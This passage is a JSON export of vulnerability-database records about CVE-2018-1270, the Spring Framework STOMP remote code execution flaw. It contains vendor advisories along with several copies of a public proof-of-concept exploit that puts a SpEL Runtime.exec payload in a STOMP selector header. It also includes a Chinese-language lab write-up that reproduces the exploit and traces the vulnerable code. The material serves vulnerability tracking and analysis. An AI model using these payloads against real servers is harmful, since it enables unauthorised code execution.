"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-01T05:08:45", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T20:05:59", "type": "github", "title": "Spring Framework allows applications to expose STOMP over WebSocket endpoints", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2023-02-01T05:03:53", "id": "GHSA-P5HG-3XM3-GCJG", "href": "https://github.com/advisories/GHSA-p5hg-3xm3-gcjg", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T05:08:16", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T20:28:00", "type": "github", "title": "Improperly Implemented Security Check for Standard in org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2023-01-27T05:00:31", "id": "GHSA-3RMV-2PG5-XVQJ", "href": "https://github.com/advisories/GHSA-3rmv-2pg5-xvqj", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2020-05-08T23:05:36", "description": "Hello! A transitive dependency issue has been found in Confluence Analytics:\r\nhttps://atlassian.sourceclear.io/workspaces/Paaina7/issues/vulnerabilities/26465610\r\n\r\nConfluence Analytics has a transitive dependency on the Spring Web MVC library, which has a security bug.\r\n\r\nThe issue can be fixed by overriding and adding a new direct dependency of the library in your project.\r\n\r\nWe do not have a confirmed fix for this issue yet. However, newer versions of the library have been released. We suggest that you upgrade to 4.3.20.RELEASE, which is considered safe.\r\n\r\nTo upgrade, update the `pom.xml` file:\r\n{code:java}\r\n+ <dependency>\r\n+ \u2003<groupId>org.springframework</groupId>\r\n+ \u2003<artifactId>spring-webmvc</artifactId>\r\n+ \u2003<version>4.3.20.RELEASE</version>\r\n+ </dependency>\r\n{code}", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-19T22:31:10", "type": "atlassian", "title": "Insecure version of Spring Web MVC used in Confluence Analytics", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9878", "CVE-2018-15756", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1270", "CVE-2016-5007"], "modified": "2020-05-08T18:00:59", "id": "ATLASSIAN:CONFSERVER-59684", "href": "https://jira.atlassian.com/browse/CONFSERVER-59684", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-04-07T03:56:29", "description": "A remote code execution vulnerability has been reported in Pivotal Spring Framework. The vulnerability is due to improper handling of user-supplied input to a STOMP broker in the spring-messaging module. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted message to the STOMP broker. Successful exploitation could lead to code execution in the context of the service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-19T00:00:00", "type": "checkpoint_advisories", "title": "Pivotal Spring Framework spring-messaging Module STOMP Remote Code Execution (CVE-2018-1270)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2019-03-03T00:00:00", "id": "CPAI-2019-0224", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-24T15:46:00", "description": "A remote code execution vulnerability exists in VMware Spring Framework. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-12T00:00:00", "type": "checkpoint_advisories", "title": "VMware Spring Framework Remote Code Execution (CVE-2018-1270; CVE-2018-1275)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2022-10-24T00:00:00", "id": "CPAI-2018-0277", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-05-30T00:19:18", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2018-05-29T00:00:00", "type": "zdt", "title": "Pivotal Spring Java Framework < 5.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-1270"], "modified": "2018-05-29T00:00:00", "id": "1337DAY-ID-30478", "href": "https://0day.today/exploit/description/30478", "sourceData": "# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution\r\n# Exploit Author: JameelNabbo\r\n# Website: jameelnabbo.com <http://jameelnabbo.com/>\r\n# Vendor Homepage:\r\n# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development\r\n# CVE: CVE: CVE-2018-1270\r\n# Version: <= 5.0.x \r\n \r\n# Description: By connecting to spring STOMP, and putting the key for \"selector\" \r\n# header, we can execute code on Spring.\r\n \r\n# POC:\r\n# Here' we are writting java commands to be executed within the selector header\r\n# Connecting to a web socket using SockJS\r\n# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable\r\n \r\nvar header = {\"selector\":\"T(java,lang.Runtime).getRuntime().exec('open -a Calculator\"};\r\n \r\nvar socket = new SockJS('/gs-guide-websocket');\r\nvar stompClient = webstomp.over(socket);\r\nstompClient.connect({}, function (frame){\r\n setConnected(true);\r\n console.log('Connected: ' + frame);\r\n stompClient.subscribe('/topic/greetings', function(greeting){\r\n showGreeting(JSON.parse(greeting.body).content);\r\n },header);\r\n});\n\n# 0day.today [2018-05-29] #", "sourceHref": "https://0day.today/exploit/30478", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-05-29T20:07:34", "description": "Pivotal Spring Java Framework < 5.0 - Remote Code Execution. CVE-2018-1270. Webapps exploit for Java platform", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "exploitdb", "title": "Pivotal Spring Java Framework < 5.0 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2018-05-29T00:00:00", "id": "EDB-ID:44796", "href": "https://www.exploit-db.com/exploits/44796/", "sourceData": "# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution\r\n# Date: 2018-05-28\r\n# Exploit Author: JameelNabbo\r\n# Website: jameelnabbo.com <http://jameelnabbo.com/>\r\n# Vendor Homepage:\r\n# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development\r\n# CVE: CVE: CVE-2018-1270\r\n# Version: <= 5.0.x \r\n\r\n# Description: By connecting to spring STOMP, and putting the key for \"selector\" \r\n# header, we can execute code on Spring.\r\n\r\n# POC:\r\n# Here' we are writting java commands to be executed within the selector header\r\n# Connecting to a web socket using SockJS\r\n# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable\r\n\r\nvar header = {\"selector\":\"T(java,lang.Runtime).getRuntime().exec('open -a Calculator\"};\r\n\r\nvar socket = new SockJS('/gs-guide-websocket');\r\nvar stompClient = webstomp.over(socket);\r\nstompClient.connect({}, function (frame){\r\n\tsetConnected(true);\r\n\tconsole.log('Connected: ' + frame);\r\n\tstompClient.subscribe('/topic/greetings', function(greeting){\r\n\t\tshowGreeting(JSON.parse(greeting.body).content);\r\n\t\t},header);\r\n});", "sourceHref": "https://www.exploit-db.com/download/44796/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-05-31T09:29:47", "description": "", "cvss3": {}, "published": "2018-05-29T00:00:00", "type": "packetstorm", "title": "Pivotal Spring Java Framework 5.0.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-1270"], "modified": "2018-05-29T00:00:00", "id": "PACKETSTORM:147974", "href": "https://packetstormsecurity.com/files/147974/Pivotal-Spring-Java-Framework-5.0.x-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution \n# Date: 2018-05-28 \n# Exploit Author: JameelNabbo \n# Website: jameelnabbo.com <http://jameelnabbo.com/> \n# Vendor Homepage: \n# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development \n# CVE: CVE: CVE-2018-1270 \n# Version: <= 5.0.x \n \n# Description: By connecting to spring STOMP, and putting the key for \"selector\" \n# header, we can execute code on Spring. \n \n# POC: \n# Here' we are writting java commands to be executed within the selector header \n# Connecting to a web socket using SockJS \n# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable \n \nvar header = {\"selector\":\"T(java,lang.Runtime).getRuntime().exec('open -a Calculator\"}; \n \nvar socket = new SockJS('/gs-guide-websocket'); \nvar stompClient = webstomp.over(socket); \nstompClient.connect({}, function (frame){ \nsetConnected(true); \nconsole.log('Connected: ' + frame); \nstompClient.subscribe('/topic/greetings', function(greeting){ \nshowGreeting(JSON.parse(greeting.body).content); \n},header); \n}); \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147974/psjf-exec.txt"}], "seebug": [{"lastseen": "2018-06-26T22:15:23", "description": "### \u6f0f\u6d1e\u516c\u544a\r\n2018\u5e744\u67085\u65e5\u6f0f\u6d1e\u516c\u5e03\uff1a https://pivotal.io/security/cve-2018-1270\r\n\r\n\r\n\r\n### \u6f0f\u6d1e\u5f71\u54cd\u7248\u672c:\r\n\r\n* Spring Framework 5.0 to 5.0.4\r\n* Spring Framework 4.3 to 4.3.14\r\n* Older unsupported versions are also affected\r\n\r\n### \u73af\u5883\u642d\u5efa\r\n\u5229\u7528\u5b98\u65b9\u793a\u4f8b https://github.com/spring-guides/gs-messaging-stomp-websocket \uff0cgit clone\u540echeckout\u5230\u672a\u66f4\u65b0\u7248\u672c\uff1a\r\n```\r\ngit clone https://github.com/spring-guides/gs-messaging-stomp-websocket\r\n\r\ngit checkout 6958af0b02bf05282673826b73cd7a85e84c12d3\r\n```\r\n\r\n\u7528IDEA\u6253\u5f00gs-messaging-stomp-websocket\u76ee\u5f55\u4e0b\u7684complete\u9879\u76ee\uff0c\u4fee\u6539app.js\u4e2d\u7684\u7b2c15\u884c\uff1a\r\n```\r\nfunction connect() {\r\n var header = {\"selector\":\"T(java.lang.Runtime).getRuntime().exec('calc.exe')\"};\r\n var socket = new SockJS('/gs-guide-websocket');\r\n stompClient = Stomp.over(socket);\r\n stompClient.connect({}, function (frame) {\r\n setConnected(true);\r\n console.log('Connected: ' + frame);\r\n stompClient.subscribe('/topic/greetings', function (greeting) {\r\n showGreeting(JSON.parse(greeting.body).content);\r\n },header);\r\n });\r\n}\r\n```\r\n\r\n\u589e\u52a0\u4e86\u4e00\u4e2aheader\u5934\u90e8\uff0c\u5176\u4e2d\u6307\u5b9a\u4e86selector\uff0c\u5176\u503c\u5373payload\u3002\r\n\r\n### \u6f0f\u6d1e\u5229\u7528\r\n\u70b9\u51fbconnect\u540e\u5efa\u7acb\u8d77\u8fde\u63a5\uff0c\u5728\u6587\u672c\u6846\u4e2d\u968f\u610f\u8f93\u5165\uff0c\u70b9\u51fbSend\uff0c\u89e6\u53d1poc\uff1a\r\n\r\n\r\n\r\n### \u6f0f\u6d1e\u5206\u6790\r\n\u5f53\u5728 http://localhost:8080/ \u4e2d\u70b9\u51fbConnect\u540e\uff0c\u5728app.js\u4e2d\uff0c\u6709\u5982\u4e0b\u4ee3\u7801\uff0c\u4f1a\u5efa\u7acb\u8d77Websocket\u8fde\u63a5\uff1a\r\n```\r\nvar header = {\"selector\":\"T(java.lang.Runtime).getRuntime().exec('calc.exe')\"};\r\n...\r\nstompClient.subscribe('/topic/greetings', function (greeting) {\r\n showGreeting(JSON.parse(greeting.body).content);\r\n},header);\r\n```\r\n\r\n\u5176\u4e2d`header`\u4e2d\u6307\u5b9a\u4e86`selector`\uff0c\u6839\u636e Stomp Protocol Specification, Version 1.0\uff0c\u901a\u8fc7\u6307\u5b9a\u5bf9\u5e94\u7684selecttor\uff0c\u53ef\u4ee5\u5bf9\u8ba2\u9605\u7684\u4fe1\u606f\u8fdb\u884c\u8fc7\u6ee4\uff1a\r\n```\r\nStomp brokers may support the selector header which allows you to specify an SQL 92 selector on the message headers which acts as a filter for content based routing.\r\n\r\nYou can also specify an id header which can then later on be used to UNSUBSCRIBE from the specific subscription as you may end up with overlapping subscriptions using selectors with the same destination. If an id header is supplied then Stomp brokers should append a subscription header to any MESSAGE commands which are sent to the client so that the client knows which subscription the message relates to. If using Wildcards and selectors this can help clients figure out what subscription caused the message to be created.\r\n```\r\n\r\n\u5728 org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java \u7b2c140\u884c\uff0c\u5bf9\u8fd9\u4e2aheader\u53c2\u6570\u8fdb\u884c\u4e86\u63a5\u53d7\u548c\u5904\u7406\uff1a\r\n```\r\nprotected void addSubscriptionInternal(\r\n String sessionId, String subsId, String destination, Message<?> message) {\r\n\r\n Expression expression = null;\r\n MessageHeaders headers = message.getHeaders();\r\n String selector = SimpMessageHeaderAccessor.getFirstNativeHeader(getSelectorHeaderName(), headers);\r\n if (selector != null) {\r\n try {\r\n expression = this.expressionParser.parseExpression(selector);\r\n this.selectorHeaderInUse = true;\r\n if (logger.isTraceEnabled()) {\r\n logger.trace(\"Subscription selector: [\" + selector + \"]\");\r\n }\r\n }\r\n catch (Throwable ex) {\r\n if (logger.isDebugEnabled()) {\r\n logger.debug(\"Failed to parse selector: \" + selector, ex);\r\n }\r\n }\r\n }\r\n this.subscriptionRegistry.addSubscription(sessionId, subsId, destination, expression);\r\n this.destinationCache.updateAfterNewSubscription(destination, sessionId, subsId);\r\n}\r\n\r\n```\r\n\r\n\r\n\r\n\u5982\u56fe\u6240\u793a\uff0c\u6b64\u6b21\u8fde\u63a5\u5bf9\u5e94\u7684sessionId\u4e3a`mrzfa005`\uff0csubsId\u4e3a`sub-0`\u3002\r\n\r\n\u4e4b\u540e\uff0c\u5728 http://localhost:8080/ \u4e2d\u8f93\u5165\u4efb\u610f\u5b57\u7b26\u4e32\uff0c\u70b9\u51fbsend\u3002spring\u8fdb\u884c\u4e86\u4e00\u7cfb\u5217\u5904\u7406\u540e\uff0c\u5f00\u59cb\u5411\u6d88\u606f\u7684\u8ba2\u9605\u8005\u5206\u53d1\u6d88\u606f\uff0c\u5728 org/springframework/messaging/simp/broker/SimpleBrokerMessageHandler.java:349 \u884c\uff1a\r\n```\r\nprotected void sendMessageToSubscribers(@Nullable String destination, Message<?> message) {\r\n MultiValueMap<String,String> subscriptions = this.subscriptionRegistry.findSubscriptions(message);\r\n ...\r\n```\r\n\r\n\u5176\u4e2dmessage\u4fdd\u5b58\u4e86\u6b64\u6b21\u8fde\u63a5/\u4f1a\u8bdd\u7684\u76f8\u5173\u4fe1\u606f\uff1a\r\n\r\n\r\n\r\n\u8ddf\u5165 `this.subscriptionRegistry.findSubscriptions` \u81f3 org/springframework/messaging/simp/broker/AbstractSubscriptionRegistry.java:111 \u884c\uff1a\r\n```\r\npublic final MultiValueMap<String, String> findSubscriptions(Message<?> message) {\r\n ....\r\n return findSubscriptionsInternal(destination, message);\r\n}\r\n```\r\n\r\nmessage\u4f5c\u4e3a\u53c2\u6570\u88ab\u4f20\u5165 `findSubscriptionsInternal` \uff0c\u5728return\u5904\u7ee7\u7eed\u8ddf\u8fdb\u81f3 org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java:184\u884c\r\n```\r\nprotected MultiValueMap<String, String> findSubscriptionsInternal(String destination, Message<?> message) {\r\n MultiValueMap<String, String> result = this.destinationCache.getSubscriptions(destination, message);\r\n return filterSubscriptions(result, message);\r\n}\r\n```\r\n\r\n\u5176\u4e2dresult\u53d8\u91cf\u503c\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\r\n\u8be5\u53d8\u91cf\u5373 org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java:201\u884c\u7684filterSubscriptions\u65b9\u6cd5\u7684allMatches\u53d8\u91cf\uff0c\u8ddf\u8fdb\u81f3\u4e24\u5c42for\u5faa\u73af\r\n```\r\nfor (String sessionId : allMatches.keySet()) {\r\n for (String subId : allMatches.get(sessionId)) {\r\n SessionSubscriptionInfo info = this.subscriptionRegistry.getSubscriptions(sessionId);\r\n if (info == null) {\r\n continue;\r\n }\r\n Subscription sub = info.getSubscription(subId);\r\n if (sub == null) {\r\n continue;\r\n }\r\n ...\r\n }\r\n}\r\n```\r\n\r\n\u901a\u8fc7\u4e24\u6b21`getSubscriptions`\u64cd\u4f5c\uff0c\u6b64\u65f6\u53d6\u51fa\u4e86\u5148\u524d\u7684\u914d\u7f6e\u4fe1\u606f\uff0csub\u53d8\u91cf\u503c\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\r\n\u63a5\u4e0b\u53bb\u7b2c 207 \u884c\u5c06selector\u8868\u8fbe\u5f0f\u53d6\u51fa\uff1a\r\n```\r\nExpression expression = sub.getSelectorExpression();\r\n```\r\n\r\n\u7b2c217\u884c\uff1a\r\n```\r\ntry {\r\n if (Boolean.TRUE.equals(expression.getValue(context, Boolean.class))) {\r\n result.add(sessionId, subId);\r\n }\r\n}\r\n```\r\n\r\n\u901a\u8fc7\u8c03\u7528\u4e86expression.getValue(context, Boolean.class)\uff0c\u89e6\u53d1payload\uff0c\u6267\u884c\u4e86spel\u8868\u8fbe\u5f0f\uff0c\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6210\u529f\u3002\r\n\r\n", "cvss3": {}, "published": "2018-04-08T00:00:00", "type": "seebug", "title": "spring-messaging Remote Code Execution(CVE-2018-1270)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-1270"], "modified": "2018-04-08T00:00:00", "id": "SSV:97214", "href": "https://www.seebug.org/vuldb/ssvid-97214", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2021-10-19T20:40:35", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.4.4 serves as a replacement for Red Hat AMQ Broker 7.4.3, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* apache-commons-configuration: uncontrolled class instantiation when loading YAML files (CVE-2020-1953)\n\n* broker: resetUsers operation stores password in plain text (EMBARGOED CVE-2020-10727)\n\n* netty: compression/decompression codecs don't enforce limits on buffer allocation sizes (CVE-2020-11612)\n\n* springframework: DoS Attack via Range Requests (CVE-2018-15756)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-23T15:06:14", "type": "redhat", "title": "(RHSA-2020:3133) Important: Red Hat AMQ Broker 7.4.4 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756", "CVE-2020-10727", "CVE-2020-11612", "CVE-2020-1953"], "modified": "2020-07-23T15:06:57", "id": "RHSA-2020:3133", "href": "https://access.redhat.com/errata/RHSA-2020:3133", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:38:55", "description": "Red Hat Openshift Application Runtimes provides an application platform that reduces the complexity of developing and operating applications (monoliths and microservices) for OpenShift as a containerized platform.\n\nThis release of RHOAR Spring Boot 1.5.12 serves as a replacement for RHOAR Spring Boot 1.5.10, and includes bug fixes and enhancements. For further information, refer to the Release Notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-framework: Address partial fix for CVE-2018-1270 (CVE-2018-1275)\n\n* spring-framework: Directory traversal vulnerability with static resources on Windows filesystems (CVE-2018-1271)\n\n* tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n* spring-framework: Multipart content pollution (CVE-2018-1272)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-03T17:05:40", "type": "redhat", "title": "(RHSA-2018:1320) Critical: Red Hat OpenShift Application Runtimes security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-1304", "CVE-2018-1305"], "modified": "2018-05-23T19:53:11", "id": "RHSA-2018:1320", "href": "https://access.redhat.com/errata/RHSA-2018:1320", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:36:54", "description": "Red Hat Fuse Integration Services provides a set of tools and containerized xPaaS images that enable development, deployment, and management of integration microservices within OpenShift.\n\nSecurity fix(es):\n\n* jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489)\n\n* spring-framework: Address partial fix for CVE-2018-1270 (CVE-2018-1275)\n\n* spring-framework: Directory traversal vulnerability with static resources on Windows filesystems (CVE-2018-1271)\n\n* spring-framework: Possible RCE 